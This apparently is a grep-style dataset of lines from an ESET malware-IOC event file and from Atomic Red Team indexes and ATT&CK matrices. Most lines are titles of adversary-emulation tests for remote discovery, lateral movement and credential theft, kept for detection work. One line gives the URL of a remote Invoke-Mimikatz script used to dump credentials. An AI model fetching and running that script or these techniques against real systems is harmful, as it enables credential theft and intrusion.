malware-ioc	misp-turla-powershell-event.json	"description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.\n\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring\n\nRequires Network: Yes",	© ESET 2014-2018
malware-ioc	gaming_supply_chain.misp_event.json	"remote-service-effects"	© ESET 2014-2018
atomic-red-team	index.md	- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1074.002 Remote Data Staging CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1114.002 Remote Email Collection CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #3: Scheduled task Remote [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: Compiled HTML Help Remote Payload [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #1: WINWORD Remote Template Injection [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: MSXSL Bypass using remote files [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #4: WMIC bypass using remote XSL file [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1133 External Remote Services	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1018 Remote System Discovery	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #1: Remote System Discovery - net [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #3: Remote System Discovery - nltest [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #4: Remote System Discovery - ping sweep [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #5: Remote System Discovery - arp [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #7: Remote System Discovery - sweep [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #8: Remote System Discovery - nslookup [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #9: Remote System Discovery - adidnsdump [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #12: Remote System Discovery - ip neighbour [linux]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #13: Remote System Discovery - ip route [linux]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #6: WMI Execute Remote Process [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1210 Exploitation of Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1021.001 Remote Desktop Protocol	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1563 Remote Service Session Hijacking CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1021 Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1021.006 Windows Remote Management	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #1: Enable Windows Remote Management [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #1: rsync remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: rsync remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #3: scp remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #4: scp remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #5: sftp remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #6: sftp remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- T1219 Remote Access Software	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- T1074.002 Remote Data Staging CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- T1114.002 Remote Email Collection CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- T1018 Remote System Discovery	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #7: Remote System Discovery - sweep [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #12: Remote System Discovery - ip neighbour [linux]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #13: Remote System Discovery - ip route [linux]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- T1133 External Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- T1210 Exploitation of Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- T1563 Remote Service Session Hijacking CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- T1021 Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #1: rsync remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #2: rsync remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #3: scp remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #4: scp remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #5: sftp remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- Atomic Test #6: sftp remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	linux-index.md	- T1219 Remote Access Software CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- T1074.002 Remote Data Staging CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- T1018 Remote System Discovery	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- Atomic Test #7: Remote System Discovery - sweep [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- Atomic Test #1: rsync remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- Atomic Test #2: rsync remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- Atomic Test #3: scp remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- Atomic Test #4: scp remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- Atomic Test #5: sftp remote file copy (push) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- Atomic Test #6: sftp remote file copy (pull) [linux, macos]	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- T1219 Remote Access Software CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- T1210 Exploitation of Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- T1563 Remote Service Session Hijacking CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	macos-index.md	- T1021 Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1074.002 Remote Data Staging CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1114.002 Remote Email Collection CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #3: Scheduled task Remote [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #2: Compiled HTML Help Remote Payload [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #1: WINWORD Remote Template Injection [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #2: MSXSL Bypass using remote files [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #4: WMIC bypass using remote XSL file [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1133 External Remote Services	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1018 Remote System Discovery	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #1: Remote System Discovery - net [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #3: Remote System Discovery - nltest [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #4: Remote System Discovery - ping sweep [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #5: Remote System Discovery - arp [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #8: Remote System Discovery - nslookup [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #9: Remote System Discovery - adidnsdump [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1219 Remote Access Software	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #6: WMI Execute Remote Process [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1210 Exploitation of Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1021.001 Remote Desktop Protocol	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1563 Remote Service Session Hijacking CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1021 Remote Services CONTRIBUTE A TEST	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- T1021.006 Windows Remote Management	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #1: Enable Windows Remote Management [windows]	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| Compromise Hardware Supply Chain CONTRIBUTE A TEST | Command and Scripting Interpreter CONTRIBUTE A TEST | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | At (Linux) | Application Access Token CONTRIBUTE A TEST | ARP Cache Poisoning CONTRIBUTE A TEST | Browser Bookmark Discovery | Exploitation of Remote Services CONTRIBUTE A TEST | Archive Collected Data CONTRIBUTE A TEST | Data Transfer Size Limits | Asymmetric Cryptography CONTRIBUTE A TEST | Application Exhaustion Flood CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| Default Accounts CONTRIBUTE A TEST | Cron | At (Linux) | Cloud Accounts | Build Image on Host CONTRIBUTE A TEST | Cloud Instance Metadata API CONTRIBUTE A TEST | Cloud Infrastructure Discovery CONTRIBUTE A TEST | Remote Service Session Hijacking CONTRIBUTE A TEST | Archive via Utility | Exfiltration Over Bluetooth CONTRIBUTE A TEST | Communication Through Removable Media CONTRIBUTE A TEST | Data Encrypted for Impact |	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| Domain Accounts CONTRIBUTE A TEST | Deploy Container CONTRIBUTE A TEST | Boot or Logon Autostart Execution CONTRIBUTE A TEST | Container Orchestration Job | Clear Command History | Container API | Cloud Service Dashboard CONTRIBUTE A TEST | Remote Services CONTRIBUTE A TEST | Audio Capture CONTRIBUTE A TEST | Exfiltration Over C2 Channel CONTRIBUTE A TEST | DNS CONTRIBUTE A TEST | Data Manipulation CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| External Remote Services CONTRIBUTE A TEST | JavaScript CONTRIBUTE A TEST | Browser Extensions | Default Accounts CONTRIBUTE A TEST | Compile After Delivery | Credentials from Password Stores CONTRIBUTE A TEST | Domain Account CONTRIBUTE A TEST | Software Deployment Tools CONTRIBUTE A TEST | Confluence CONTRIBUTE A TEST | Exfiltration Over Symmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Data Obfuscation CONTRIBUTE A TEST | Disk Content Wipe CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| | User Execution CONTRIBUTE A TEST | Exchange Email Delegate Permissions CONTRIBUTE A TEST | Ptrace System Calls CONTRIBUTE A TEST | Domain Policy Modification CONTRIBUTE A TEST | Password Managers CONTRIBUTE A TEST | Remote System Discovery | | Man-in-the-Middle CONTRIBUTE A TEST | | Mail Protocols CONTRIBUTE A TEST | Service Exhaustion Flood CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| | Visual Basic CONTRIBUTE A TEST | External Remote Services CONTRIBUTE A TEST | RC Scripts | Domain Trust Modification | Password Spraying | Security Software Discovery | | Network Device Configuration Dump CONTRIBUTE A TEST | | Multi-Stage Channels CONTRIBUTE A TEST | Service Stop CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| | | Hijack Execution Flow CONTRIBUTE A TEST | Scheduled Task/Job CONTRIBUTE A TEST | Downgrade System Image CONTRIBUTE A TEST | Pluggable Authentication Modules | Software Discovery CONTRIBUTE A TEST | | Remote Data Staging CONTRIBUTE A TEST | | Multi-hop Proxy | Stored Data Manipulation CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| | | Implant Internal Image CONTRIBUTE A TEST | Setuid and Setgid | Dynamic Linker Hijacking | Private Keys | System Checks | | Remote Email Collection CONTRIBUTE A TEST | | Multiband Communication CONTRIBUTE A TEST | System Shutdown/Reboot |	MIT License. © 2018 Red Canary
atomic-red-team	linux-matrix.md	| | | Outlook Forms CONTRIBUTE A TEST | | Hijack Execution Flow CONTRIBUTE A TEST | Web Portal Capture CONTRIBUTE A TEST | | | | | Remote Access Software CONTRIBUTE A TEST | |	MIT License. © 2018 Red Canary
atomic-red-team	macos-matrix.md	| Compromise Hardware Supply Chain CONTRIBUTE A TEST | AppleScript | Account Manipulation CONTRIBUTE A TEST | Abuse Elevation Control Mechanism CONTRIBUTE A TEST | Abuse Elevation Control Mechanism CONTRIBUTE A TEST | ARP Cache Poisoning CONTRIBUTE A TEST | Account Discovery CONTRIBUTE A TEST | Exploitation of Remote Services CONTRIBUTE A TEST | ARP Cache Poisoning CONTRIBUTE A TEST | Automated Exfiltration CONTRIBUTE A TEST | Application Layer Protocol CONTRIBUTE A TEST | Account Access Removal CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	macos-matrix.md	| Default Accounts CONTRIBUTE A TEST | Exploitation for Client Execution CONTRIBUTE A TEST | Browser Extensions | Create or Modify System Process CONTRIBUTE A TEST | Clear Linux or Mac System Logs | Credential Stuffing | Domain Account CONTRIBUTE A TEST | Remote Service Session Hijacking CONTRIBUTE A TEST | Archive via Library CONTRIBUTE A TEST | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Commonly Used Port CONTRIBUTE A TEST | Data Destruction |	MIT License. © 2018 Red Canary
atomic-red-team	macos-matrix.md	| Domain Accounts CONTRIBUTE A TEST | Graphical User Interface CONTRIBUTE A TEST | Compromise Client Software Binary CONTRIBUTE A TEST | Cron | Code Signing CONTRIBUTE A TEST | Credentials In Files | Domain Groups CONTRIBUTE A TEST | Remote Services CONTRIBUTE A TEST | Archive via Utility | Exfiltration Over Bluetooth CONTRIBUTE A TEST | Communication Through Removable Media CONTRIBUTE A TEST | Data Encrypted for Impact CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	macos-matrix.md	| | System Services CONTRIBUTE A TEST | Kernel Modules and Extensions CONTRIBUTE A TEST | Launch Agent | Execution Guardrails CONTRIBUTE A TEST | OS Credential Dumping CONTRIBUTE A TEST | Remote System Discovery | | Local Data Staging | | Fast Flux DNS CONTRIBUTE A TEST | Network Denial of Service CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	macos-matrix.md	| | User Execution CONTRIBUTE A TEST | Launch Agent | Launchd | File Deletion | Password Guessing CONTRIBUTE A TEST | Software Discovery | | Remote Data Staging CONTRIBUTE A TEST | | Ingress Tool Transfer | Reflection Amplification CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	macos-matrix.md	| | | Server Software Component CONTRIBUTE A TEST | | Invalid Code Signature CONTRIBUTE A TEST | | | | | | Remote Access Software CONTRIBUTE A TEST | |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| Compromise Software Supply Chain CONTRIBUTE A TEST | Command and Scripting Interpreter CONTRIBUTE A TEST | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | Active Setup CONTRIBUTE A TEST | Asynchronous Procedure Call | Bash History | Cloud Account CONTRIBUTE A TEST | Exploitation of Remote Services CONTRIBUTE A TEST | Archive via Library | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Commonly Used Port CONTRIBUTE A TEST | Data Destruction |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| External Remote Services | Cron | Application Shimming | At (Linux) | Bypass User Account Control | Credential API Hooking | Container and Resource Discovery CONTRIBUTE A TEST | RDP Hijacking | Confluence CONTRIBUTE A TEST | Exfiltration Over Symmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Data Obfuscation CONTRIBUTE A TEST | Disk Content Wipe CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| Hardware Additions CONTRIBUTE A TEST | Deploy Container CONTRIBUTE A TEST | At (Linux) | At (Windows) | CMSTP | Credential Stuffing | Domain Account | Remote Desktop Protocol | Credential API Hooking | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Dead Drop Resolver CONTRIBUTE A TEST | Disk Structure Wipe CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| Local Accounts | Dynamic Data Exchange | At (Windows) | Authentication Package | COR_PROFILER | Credentials In Files | Domain Groups | Remote Service Session Hijacking CONTRIBUTE A TEST | Data Staged CONTRIBUTE A TEST | Exfiltration Over Web Service | Domain Fronting CONTRIBUTE A TEST | Disk Wipe CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| Phishing CONTRIBUTE A TEST | Exploitation for Client Execution CONTRIBUTE A TEST | Authentication Package | Boot or Logon Autostart Execution CONTRIBUTE A TEST | Clear Command History | Credentials from Password Stores | Domain Trust Discovery | Remote Services CONTRIBUTE A TEST | Data from Cloud Storage Object CONTRIBUTE A TEST | Exfiltration over USB CONTRIBUTE A TEST | Domain Generation Algorithms CONTRIBUTE A TEST | Endpoint Denial of Service CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| | PowerShell | Component Object Model Hijacking | DLL Search Order Hijacking | Create Process with Token | Input Capture CONTRIBUTE A TEST | Permission Groups Discovery CONTRIBUTE A TEST | Windows Remote Management | LLMNR/NBT-NS Poisoning and SMB Relay | | Multi-Stage Channels CONTRIBUTE A TEST | Service Stop |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| | Scheduled Task/Job CONTRIBUTE A TEST | Create Account CONTRIBUTE A TEST | Domain Accounts CONTRIBUTE A TEST | DLL Side-Loading | Keylogging | Remote System Discovery | | Man in the Browser CONTRIBUTE A TEST | | Non-Application Layer Protocol | Transmitted Data Manipulation CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| | Shared Modules CONTRIBUTE A TEST | DLL Search Order Hijacking | Dylib Hijacking CONTRIBUTE A TEST | Deobfuscate/Decode Files or Information | LSASS Memory | System Checks | | Remote Data Staging CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| | Software Deployment Tools | DLL Side-Loading | Dynamic Linker Hijacking | Deploy Container CONTRIBUTE A TEST | Man-in-the-Middle CONTRIBUTE A TEST | System Information Discovery | | Remote Email Collection CONTRIBUTE A TEST | | Port Knocking CONTRIBUTE A TEST | |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| | Unix Shell | Domain Controller Authentication CONTRIBUTE A TEST | Escape to Host | Disable Windows Event Logging | Network Sniffing | System Owner/User Discovery | | Video Capture | | Remote Access Software | |	MIT License. © 2018 Red Canary
atomic-red-team	matrix.md	| | | External Remote Services | Image File Execution Options Injection | Domain Trust Modification | Pluggable Authentication Modules | | | | | | |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| Compromise Software Supply Chain CONTRIBUTE A TEST | Component Object Model CONTRIBUTE A TEST | Active Setup CONTRIBUTE A TEST | Accessibility Features | Asynchronous Procedure Call | Brute Force CONTRIBUTE A TEST | Browser Bookmark Discovery | Exploitation of Remote Services CONTRIBUTE A TEST | Archive via Custom Method CONTRIBUTE A TEST | Exfiltration Over Alternative Protocol | Bidirectional Communication CONTRIBUTE A TEST | Application or System Exploitation CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| External Remote Services | Inter-Process Communication CONTRIBUTE A TEST | At (Windows) | Asynchronous Procedure Call | CMSTP | Credentials from Password Stores | File and Directory Discovery | RDP Hijacking | Clipboard Data | Exfiltration Over Physical Medium CONTRIBUTE A TEST | Data Encoding CONTRIBUTE A TEST | Direct Network Flood CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| Hardware Additions CONTRIBUTE A TEST | JavaScript CONTRIBUTE A TEST | Authentication Package | At (Windows) | COR_PROFILER | Credentials from Web Browsers | Internet Connection Discovery CONTRIBUTE A TEST | Remote Desktop Protocol | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Data Obfuscation CONTRIBUTE A TEST | Disk Content Wipe CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| Local Accounts | Malicious File | BITS Jobs | Authentication Package | Clear Command History | Credentials in Registry | Local Account | Remote Service Session Hijacking CONTRIBUTE A TEST | Data Staged CONTRIBUTE A TEST | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Dead Drop Resolver CONTRIBUTE A TEST | Disk Structure Wipe CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| Phishing CONTRIBUTE A TEST | Malicious Link CONTRIBUTE A TEST | Boot or Logon Autostart Execution CONTRIBUTE A TEST | Boot or Logon Autostart Execution CONTRIBUTE A TEST | Clear Windows Event Logs | DCSync | Local Groups | Remote Services CONTRIBUTE A TEST | Data from Information Repositories CONTRIBUTE A TEST | Exfiltration Over Web Service | Domain Fronting CONTRIBUTE A TEST | Disk Wipe CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| | Shared Modules CONTRIBUTE A TEST | Compromise Client Software Binary CONTRIBUTE A TEST | DLL Search Order Hijacking | DLL Search Order Hijacking | Input Capture CONTRIBUTE A TEST | Query Registry | Windows Remote Management | Keylogging | | Ingress Tool Transfer | Reflection Amplification CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| | Software Deployment Tools | Create Account CONTRIBUTE A TEST | DLL Side-Loading | DLL Side-Loading | Kerberoasting | Remote System Discovery | | LLMNR/NBT-NS Poisoning and SMB Relay | | Internal Proxy | Resource Hijacking CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| | Windows Management Instrumentation | Domain Account | Dynamic-link Library Injection | Disable or Modify System Firewall | Man-in-the-Middle CONTRIBUTE A TEST | System Location Discovery CONTRIBUTE A TEST | | Remote Data Staging CONTRIBUTE A TEST | | Multiband Communication CONTRIBUTE A TEST | System Shutdown/Reboot |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| | | Domain Accounts CONTRIBUTE A TEST | Escape to Host CONTRIBUTE A TEST | Disable or Modify Tools | Modify Authentication Process CONTRIBUTE A TEST | System Network Configuration Discovery | | Remote Email Collection CONTRIBUTE A TEST | | Non-Application Layer Protocol | Transmitted Data Manipulation CONTRIBUTE A TEST |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| | | External Remote Services | Group Policy Modification CONTRIBUTE A TEST | Dynamic-link Library Injection | Password Filter DLL | Time Based Evasion CONTRIBUTE A TEST | | | | Protocol Impersonation CONTRIBUTE A TEST | |	MIT License. © 2018 Red Canary
atomic-red-team	windows-matrix.md	| | | Image File Execution Options Injection | LSASS Driver CONTRIBUTE A TEST | Execution Guardrails CONTRIBUTE A TEST | Password Spraying | | | | | Remote Access Software | |	MIT License. © 2018 Red Canary
atomic-red-team	T1003.001.md	* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)	MIT License. © 2018 Red Canary
atomic-red-team	T1003.001.md	Dumps credentials from memory via Powershell by invoking a remote mimikatz script.	MIT License. © 2018 Red Canary
atomic-red-team	T1003.001.md	| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|	MIT License. © 2018 Red Canary
atomic-red-team	T1003.003.md	This test is intended to be run from a remote workstation with domain admin context.	MIT License. © 2018 Red Canary
atomic-red-team	T1003.006.md	<blockquote>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller’s application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.	MIT License. © 2018 Red Canary
atomic-red-team	T1003.006.md	Works against a remote Windows Domain Controller using the replication protocol.	MIT License. © 2018 Red Canary
